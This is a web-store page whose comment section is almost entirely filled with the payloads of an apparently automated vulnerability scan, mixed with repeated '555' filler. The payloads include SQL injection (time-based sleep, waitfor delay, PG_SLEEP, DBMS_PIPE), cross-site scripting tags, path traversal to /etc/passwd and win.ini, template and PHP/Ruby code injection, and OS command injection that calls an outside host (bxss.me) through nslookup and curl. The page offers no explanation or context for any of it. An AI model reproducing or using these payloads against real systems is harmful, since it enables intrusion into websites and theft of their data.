Our online store is officially up and running. Stock up for the holiday season! We have a great selection of items. We will be constantly adding to our range so please register on our site, this will enable you to keep up to date with any new products.
All shipping is worldwide and will leave the same day an order is placed! Happy Shopping and spread the word!!
This is a sample comment...
555
555
response.write(9695022*9189214)
'+response.write(9695022*9189214)+'
"+response.write(9695022*9189214)+"
555
555
555
555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
555
echo wjpjij$()\ agymue\nz^xyu||a #' &echo wjpjij$()\ agymue\nz^xyu||a #|" &echo wjpjij$()\ agymue\nz^xyu||a #
&echo vcswks$()\ jafprt\nz^xyu||a #' &echo vcswks$()\ jafprt\nz^xyu||a #|" &echo vcswks$()\ jafprt\nz^xyu||a #
|echo bfmejm$()\ duohgd\nz^xyu||a #' |echo bfmejm$()\ duohgd\nz^xyu||a #|" |echo bfmejm$()\ duohgd\nz^xyu||a #
(nslookup hitaidbchdvop517ac.bxss.me||perl -e "gethostbyname('hitaidbchdvop517ac.bxss.me')")
$(nslookup hitagkonxmadu4fac4.bxss.me||perl -e "gethostbyname('hitagkonxmadu4fac4.bxss.me')")
&(nslookup hitbeqckqiavl37e3c.bxss.me||perl -e "gethostbyname('hitbeqckqiavl37e3c.bxss.me')")&'\"`0&(nslookup hitbeqckqiavl37e3c.bxss.me||perl -e "gethostbyname('hitbeqckqiavl37e3c.bxss.me')")&`'
|(nslookup hitwbmjesyfrh3f33a.bxss.me||perl -e "gethostbyname('hitwbmjesyfrh3f33a.bxss.me')")
555
`(nslookup hitxjieaazfvzba033.bxss.me||perl -e "gethostbyname('hitxjieaazfvzba033.bxss.me')")`
;(nslookup hitzdcgqubjku0d9fa.bxss.me||perl -e "gethostbyname('hitzdcgqubjku0d9fa.bxss.me')")|(nslookup hitzdcgqubjku0d9fa.bxss.me||perl -e "gethostbyname('hitzdcgqubjku0d9fa.bxss.me')")&(nslookup hitzdcgqubjku0d9fa.bxss.me||perl -e "gethostbyname('hitzdcgqubjku0d9fa.bxss.me')")
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
UTRDDdwD
555
555
555
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
<!--
555
555
555
555
555'"()&%<acx><ScRiPt >Woo8(9549)</ScRiPt>
'"()&%<acx><ScRiPt >Woo8(9306)</ScRiPt>
5559137971
acu10123<s1﹥s2ʺs3ʹuca10123
acux8608%C0%BEz1%C0%BCz2a%90bcxuca8608
<%={{={@{#{${acx}}%>
<th:t="${acx}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >Woo8(9481)</ScRiPt>
555<WCUWWL>PDGZD[!+!]</WCUWWL>
555<script>Woo8(9246)</script>
555<ScR<ScRiPt>IpT>Woo8(9171)</sCr<ScRiPt>IpT>
555<ScRiPt
>Woo8(9405)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9658></ScRiPt>
555<isindex type=image src=1 onerror=Woo8(9912)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9087'>
555<body onload=Woo8(9322)>
555<img src=//xss.bxss.me/t/dot.gif onload=Woo8(9192)>
555<img src=xyz OnErRor=Woo8(9326)>
555<img/src=">" onerror=alert(9056)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%57%6F%6F%38%289747%29%3C%2F%73%43%72%69%70%54%3E
555&n949460=v916061
555\u003CScRiPt\Woo8(9341)\u003C/sCripT\u003E
555
555<ScRiPt>Woo8(9394)</sCripT>
555
%F6<img acu onmouseover=Woo8(99401) //%F6>
555<input autofocus onfocus=Woo8(9495)>
555
bcc:009247.80505-96236.80505.f9d9f.19871.2@bxss.me
to@example.com>
bcc:009247.80505-96237.80505.f9d9f.19871.2@bxss.me
555
555
<a HrEF=http://xss.bxss.me></a>
555
555
<a HrEF=jaVaScRiPT:>
/xfs.bxss.me
555
555
555}body{acu:Expre/**/SSion(Woo8(9326))}
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
5558k4eQ
<ScRiPt >Woo8(9646)</ScRiPt>
${9999656+10000362}
555
555
555<WKAGFH>EZAG8[!+!]</WKAGFH>
555<ifRAme sRc=9155.com></IfRamE>
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
555<aTSPmIs x=9687>
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
bxss.me
555<img sRc='http://attacker-9570/log.php?
555
555
555
555
555<aTXMgwl<
555
555
555
555
555
555
)
555
!(()&&!|*|*|
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
bxss.me/t/xss.html?%00
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(101).concat(71).concat(100).concat(66)+(require"socket"
Socket.gethostbyname("hitlp"+"xuparzwp65559.bxss.me.")[3].to_s)+"
555
'+'A'.concat(70-3).concat(22*4).concat(101).concat(76).concat(105).concat(78)+(require'socket'
Socket.gethostbyname('hitfw'+'gbkkayiy04aea.bxss.me.')[3].to_s)+'
555
555
555
NewsCommentAdd
NewsCommentAdd/.
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
555
'.gethostbyname(lc('hitsi'.'ngygskmq6dade.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(69).chr(121).chr(68).'
'"()
".gethostbyname(lc("hitfe"."wqoemqkj40c6f.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(66).chr(115).chr(80)."
555
555
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
555
";print(md5(31337));$a="
${@print(md5(31337))}
555
${@print(md5(31337))}\
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+379-379-1=0+0+0+1 --
-1 OR 2+612-612-1=0+0+0+1
-1' OR 2+731-731-1=0+0+0+1 --
-1' OR 2+371-371-1=0+0+0+1 or 'hFcudFc7'='
-1" OR 2+246-246-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
BLCTqxzS'; waitfor delay '0:0:15' --
T2qlZJp8'); waitfor delay '0:0:15' --
NuN7BSLP')); waitfor delay '0:0:15' --
-5 OR 490=(SELECT 490 FROM PG_SLEEP(15))--
-5) OR 394=(SELECT 394 FROM PG_SLEEP(15))--
-1)) OR 244=(SELECT 244 FROM PG_SLEEP(15))--
akWaBkLl' OR 474=(SELECT 474 FROM PG_SLEEP(15))--
X2PNwbLb') OR 328=(SELECT 328 FROM PG_SLEEP(15))--
FdRSiKcO')) OR 168=(SELECT 168 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@hMs30
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
555
../555
555
555
555
555
555
555
555
555
555
555
555
response.write(9380196*9586929)
555
'+response.write(9380196*9586929)+'
"+response.write(9380196*9586929)+"
/../../../../../../../../../../windows/system32/BITSADMIN.exe
<% response.write(9380196*9586929) %>
555
+response.write(9380196*9586929)'
555
555
555
555
555
555
)
!(()&&!|*|*|
^(#$!@#$)(()))******
555
555
555
555
555
555
555
echo mfoftd$()\ fwhobt\nz^xyu||a #' &echo mfoftd$()\ fwhobt\nz^xyu||a #|" &echo mfoftd$()\ fwhobt\nz^xyu||a #
555
555
&echo dxocly$()\ nrmlgs\nz^xyu||a #' &echo dxocly$()\ nrmlgs\nz^xyu||a #|" &echo dxocly$()\ nrmlgs\nz^xyu||a #
555
555&echo izggze$()\ rdbndt\nz^xyu||a #' &echo izggze$()\ rdbndt\nz^xyu||a #|" &echo izggze$()\ rdbndt\nz^xyu||a #
555
|echo woounq$()\ hwdlap\nz^xyu||a #' |echo woounq$()\ hwdlap\nz^xyu||a #|" |echo woounq$()\ hwdlap\nz^xyu||a #
555|echo dfafue$()\ xhhvcf\nz^xyu||a #' |echo dfafue$()\ xhhvcf\nz^xyu||a #|" |echo dfafue$()\ xhhvcf\nz^xyu||a #
555
(nslookup -q=cname hitvrbvreenohf3095.bxss.me||curl hitvrbvreenohf3095.bxss.me))
$(nslookup -q=cname hitbmuuizdtxfcbdec.bxss.me||curl hitbmuuizdtxfcbdec.bxss.me)
&nslookup -q=cname hitefeuweyfqp422a7.bxss.me&'\"`0&nslookup -q=cname hitefeuweyfqp422a7.bxss.me&`'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
&(nslookup -q=cname hitumcrcnkdbi5cd11.bxss.me||curl hitumcrcnkdbi5cd11.bxss.me)&'\"`0&(nslookup -q=cname hitumcrcnkdbi5cd11.bxss.me||curl hitumcrcnkdbi5cd11.bxss.me)&`'
';print(md5(31337));$a='
|(nslookup -q=cname hitteqtzlfurq9e2a5.bxss.me||curl hitteqtzlfurq9e2a5.bxss.me)
";print(md5(31337));$a="
`(nslookup -q=cname hitgjziyzfgya3e394.bxss.me||curl hitgjziyzfgya3e394.bxss.me)`
${@print(md5(31337))}
;(nslookup -q=cname hiteaeladvkekbd6a6.bxss.me||curl hiteaeladvkekbd6a6.bxss.me)|(nslookup -q=cname hiteaeladvkekbd6a6.bxss.me||curl hiteaeladvkekbd6a6.bxss.me)&(nslookup -q=cname hiteaeladvkekbd6a6.bxss.me||curl hiteaeladvkekbd6a6.bxss.me)
${@print(md5(31337))}\
|(nslookup${IFS}-q${IFS}cname${IFS}hitkepyfsyqvh343be.bxss.me||curl${IFS}hitkepyfsyqvh343be.bxss.me)
'.print(md5(31337)).'
&(nslookup${IFS}-q${IFS}cname${IFS}hityavklutuyc08bf4.bxss.me||curl${IFS}hityavklutuyc08bf4.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hityavklutuyc08bf4.bxss.me||curl${IFS}hityavklutuyc08bf4.bxss.me)&`'
555
555
555
555
555
555
555
555
555
'"()
555
555
555'&&sleep(27*1000)*cerlif&&'
555
555
555"&&sleep(27*1000)*tlgozq&&"
555
555'||sleep(27*1000)*xviwoc||'
555
https://shoptest.crucial.in/
555"||sleep(27*1000)*vycfir||"
555
shoptest.crucial.in
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitpn'.'blyazqyf77f79.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(70).chr(120).chr(65).'
NewsCommentAdd
555
".gethostbyname(lc("hitcg"."udlqvecz1b711.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(73).chr(110).chr(68)."
gethostbyname(lc('hitgq'.'pwkuhoykbd19d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(85).chr(117).chr(86)
NewsCommentAdd/.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
555
555
<!--
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(118).concat(76).concat(102).concat(83)+(require"socket"
Socket.gethostbyname("hitfq"+"vnchtgnb223ee.bxss.me.")[3].to_s)+"
555
555
'+'A'.concat(70-3).concat(22*4).concat(120).concat(70).concat(110).concat(72)+(require'socket'
Socket.gethostbyname('hitre'+'chwxodsqd0d4e.bxss.me.')[3].to_s)+'
555
555
'A'.concat(70-3).concat(22*4).concat(98).concat(77).concat(105).concat(77)+(require'socket'
Socket.gethostbyname('hitpz'+'hoiemdxaea328.bxss.me.')[3].to_s)
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
${10000007+9999848}
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >MHi3(9110)</ScRiPt>
'"()&%<zzz><ScRiPt >MHi3(9896)</ScRiPt>
555
555
5559894074
555
555
555
555
555
bfg2019<s1﹥s2ʺs3ʹhjl2019
bfgx7424%C0%BEz1%C0%BCz2a%90bcxhjl7424
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >MHi3(9916)</ScRiPt>
555<WUCWYJ>VNGDQ[!+!]</WUCWYJ>
555
555<script>MHi3(9200)</script>
555<script>MHi3(9516)</script>9516
555
555<ScR<ScRiPt>IpT>MHi3(9570)</sCr<ScRiPt>IpT>
-1 OR 2+140-140-1=0+0+0+1 --
-1 OR 2+376-376-1=0+0+0+1
-1' OR 2+972-972-1=0+0+0+1 --
555<ScRiPt
>MHi3(9877)</ScRiPt>
-1' OR 2+344-344-1=0+0+0+1 or '9ed6Y7Im'='
-1" OR 2+685-685-1=0+0+0+1 --
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9635></ScRiPt>
555*if(now()=sysdate(),sleep(15),0)
555<isindex type=image src=1 onerror=MHi3(9128)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9863'>
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555<body onload=MHi3(9368)>
555<img src=//xss.bxss.me/t/dot.gif onload=MHi3(9586)>
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555<img src=xyz OnErRor=MHi3(9097)>
555<img/src=">" onerror=alert(9453)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%4D%48%69%33%289592%29%3C%2F%73%43%72%69%70%54%3E
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555\u003CScRiPt\MHi3(9364)\u003C/sCripT\u003E
555-1; waitfor delay '0:0:15' --
555<ScRiPt>MHi3(9284)</sCripT>
%F6<img zzz onmouseover=MHi3(97231) //%F6>
555-1); waitfor delay '0:0:15' --
555<input autofocus onfocus=MHi3(9611)>
<a HrEF=http://xss.bxss.me></a>
555-1)); waitfor delay '0:0:15' --
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(MHi3(9157))}
555-1 waitfor delay '0:0:15' --
555ckhV7
<ScRiPt >MHi3(9389)</ScRiPt>
555<WUFSPW>WO6GW[!+!]</WUFSPW>
555iTqF6dxv'; waitfor delay '0:0:15' --
555<ifRAme sRc=9538.com></IfRamE>
555frX8CsqR'); waitfor delay '0:0:15' --
555<ayWB0yo x=9132>
555<img sRc='http://attacker-9618/log.php?
555S2e4vt6M')); waitfor delay '0:0:15' --
555<aSLDAcc<
555
555-1 OR 799=(SELECT 799 FROM PG_SLEEP(15))--
555
555
555-1) OR 510=(SELECT 510 FROM PG_SLEEP(15))--
555-1)) OR 824=(SELECT 824 FROM PG_SLEEP(15))--
555VF127mlf' OR 846=(SELECT 846 FROM PG_SLEEP(15))--
555
555AMuvl94v') OR 727=(SELECT 727 FROM PG_SLEEP(15))--
555
555
555VfqyukEu')) OR 527=(SELECT 527 FROM PG_SLEEP(15))--
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@Mq0Dk
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9649642*9706152)
'+response.write(9649642*9706152)+'
"+response.write(9649642*9706152)+"
<% response.write(9649642*9706152) %>
+response.write(9649642*9706152)'
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitqs'.'afxaemgad5d8a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(67).chr(112).chr(76).'
".gethostbyname(lc("hitep"."alnsnpfac18bc.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(88).chr(102).chr(77)."
gethostbyname(lc('hitdc'.'eotivhmub5ffe.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(71).chr(108).chr(68)
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(120).concat(77).concat(109).concat(69)+(require"socket"
Socket.gethostbyname("hitvm"+"foytznpc480e2.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(107).concat(76).concat(120).concat(67)+(require'socket'
Socket.gethostbyname('hitbo'+'fzpojjikb2cfd.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(118).concat(79).concat(113).concat(81)+(require'socket'
Socket.gethostbyname('hitaa'+'xkbozfaf4a5ee.bxss.me.')[3].to_s)
555
555
555
555
555
555
555
555
555
-1 OR 2+116-116-1=0+0+0+1 --
-1 OR 2+400-400-1=0+0+0+1
-1' OR 2+866-866-1=0+0+0+1 --
-1' OR 2+78-78-1=0+0+0+1 or 'XJkCKa0E'='
-1" OR 2+845-845-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555XAtVgdo2'; waitfor delay '0:0:15' --
555eVXBFg7b'); waitfor delay '0:0:15' --
555xp9HRffQ')); waitfor delay '0:0:15' --
555-1 OR 987=(SELECT 987 FROM PG_SLEEP(15))--
555-1) OR 987=(SELECT 987 FROM PG_SLEEP(15))--
555-1)) OR 145=(SELECT 145 FROM PG_SLEEP(15))--
55569w5K9XW' OR 509=(SELECT 509 FROM PG_SLEEP(15))--
555ISjJusgJ') OR 92=(SELECT 92 FROM PG_SLEEP(15))--
555pQIcwh4G')) OR 157=(SELECT 157 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@DP0jP
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'nF4QUWVw'='
-1" OR 5*5=25 or "weaw8nw4"="
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555ih4a92Re'; waitfor delay '0:0:15' --
555r6t9jdTy'); waitfor delay '0:0:15' --
555K70TbvrC')); waitfor delay '0:0:15' --
555-1 OR 915=(SELECT 915 FROM PG_SLEEP(15))--
555-1) OR 442=(SELECT 442 FROM PG_SLEEP(15))--
555-1)) OR 323=(SELECT 323 FROM PG_SLEEP(15))--
555HErLEjKp' OR 676=(SELECT 676 FROM PG_SLEEP(15))--
555HuYUeZAF') OR 292=(SELECT 292 FROM PG_SLEEP(15))--
555jfvE2bne')) OR 601=(SELECT 601 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@Ie3GN
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'Xw6NfsGN'='
-1" OR 5*5=25 or "YEheZ1ZN"="
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555T8FTwZ5c'; waitfor delay '0:0:15' --
555fOONkKCb'); waitfor delay '0:0:15' --
555B9uxivsK')); waitfor delay '0:0:15' --
555-1 OR 798=(SELECT 798 FROM PG_SLEEP(15))--
555-1) OR 68=(SELECT 68 FROM PG_SLEEP(15))--
555-1)) OR 458=(SELECT 458 FROM PG_SLEEP(15))--
555wfWMDZ5J' OR 356=(SELECT 356 FROM PG_SLEEP(15))--
555Si8zlsLI') OR 938=(SELECT 938 FROM PG_SLEEP(15))--
555nX6k3dwn')) OR 75=(SELECT 75 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@2fB4u
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+459-459-1=0+0+0+1 --
-1 OR 2+186-186-1=0+0+0+1
-1' OR 2+206-206-1=0+0+0+1 --
-1' OR 2+841-841-1=0+0+0+1 or 'IyP8GdHz'='
-1" OR 2+733-733-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555aLDj2VJw'; waitfor delay '0:0:15' --
555kT6UV3K6'); waitfor delay '0:0:15' --
555uMjqp1rF')); waitfor delay '0:0:15' --
555-1 OR 234=(SELECT 234 FROM PG_SLEEP(15))--
555-1) OR 940=(SELECT 940 FROM PG_SLEEP(15))--
555-1)) OR 677=(SELECT 677 FROM PG_SLEEP(15))--
555z7MdrWtC' OR 534=(SELECT 534 FROM PG_SLEEP(15))--
5558n4mnybR') OR 519=(SELECT 519 FROM PG_SLEEP(15))--
555Bl732GsJ')) OR 664=(SELECT 664 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@d76lR
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+97-97-1=0+0+0+1 --
-1 OR 2+128-128-1=0+0+0+1
-1' OR 2+808-808-1=0+0+0+1 --
-1' OR 2+980-980-1=0+0+0+1 or 'eK5NZwGl'='
-1" OR 2+438-438-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
uwIbGaAV'; waitfor delay '0:0:15' --
VhgHT8rh'); waitfor delay '0:0:15' --
whbXPSVX')); waitfor delay '0:0:15' --
-5 OR 803=(SELECT 803 FROM PG_SLEEP(15))--
-5) OR 742=(SELECT 742 FROM PG_SLEEP(15))--
-1)) OR 407=(SELECT 407 FROM PG_SLEEP(15))--
00h4JO67' OR 254=(SELECT 254 FROM PG_SLEEP(15))--
XQlQSzTE') OR 632=(SELECT 632 FROM PG_SLEEP(15))--
yzEgRWYM')) OR 473=(SELECT 473 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@lP0zT
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555